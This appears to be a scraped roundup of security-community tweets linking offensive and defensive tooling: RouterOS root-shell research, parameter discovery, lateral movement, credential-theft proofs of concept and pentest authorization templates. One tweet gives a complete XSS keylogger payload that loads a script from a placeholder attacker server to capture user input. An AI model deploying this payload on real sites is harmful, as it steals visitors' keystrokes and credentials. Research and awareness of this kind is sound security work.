Pentester
- Offensive Security (Red Teaming / PenTesting)
- Blue Team (OpSec, Threat Hunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
RouterOS : Chain to Root - DNS Request to a Root Busybox Shell : https://t.co/eDqnIDHKdV

Bug Hunting in RouterOS : https://t.co/FqxamHNdUs (Slides)

PoC : https://t.co/IsCXSysp8j
Arjun : HTTP parameter discovery suite (a typical scan takes 30 seconds with a huge list of 25,980 parameter names) : https://t.co/L14G2peGuW
WEIZZ: Automatic Grey-box Fuzzing for Structured Binary Formats
Target has an Android app?

1. Download it
2. Use Diggy (https://t.co/qp3LIHZRge) to extract URLs
3. Use Arjun (https://t.co/Y02eaYsbow) to find parameters on those URLs
Remote XSS Keylogger:

Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>

This will log a user's input to your remote server.

keylogger.php: https://t.co/PwIvyt9Uss

keylogger.js: https://t.co/g5HoTeA5z2
Interesting way to move laterally using the service manager without registering a service or writing a file to disk.

C# and PowerShell versions will be released soon.

https://t.co/ZGA78JFJxQ

Thanks to ChangeServiceConfigA
Happy to see more usages of Credential Guard protection in Windows 10 (Enterprise/Business), with persistence across reboots. #mimikatz

* BCryptIsoKeyData for CNG private keys;
* Credential for domain_password credentials;
* LsaIsoAsymmetricKeyBlob for MachineBoundCertificate.
#checkra1n beta 0.9.3 is out with significant improvements - get it at https://t.co/MqMSSonazH
Use it to search for TLS certificates in the IPv4 space 🔍
https://t.co/YVeyCcM1El
Reminder for those asking me how to get started: this is one of the repos where you will find a lot of the info you need. It's overwhelming. Make a list of skills you want to learn and focus on one at a time. https://t.co/Dnhng9e4Kk

List of CTF sites on my site here:

https://t.co/9YboEtLmz2
PoC, RemoteViewing, to demo RDP credential theft (adapted from @0x09AL's post => https://t.co/sUhkZ7asOR) using EasyHook and Donut ☠️🖥️. More details on GitHub => https://t.co/bRXrFOR7Zu
Sn1per v7.4 Released! New exploits (shoutout @D0rkerDevil), virtual host scanning, several new OSINT checks, various fixes + more! https://t.co/Z4NUaXRieP
Open-sourced legal documentation used for physical penetration tests.

The purpose is to help the community and organizations protect their employees when conducting testing.

Includes three docs:

MSA
SOW
Authorization Letter

https://t.co/Tco6WuuuaU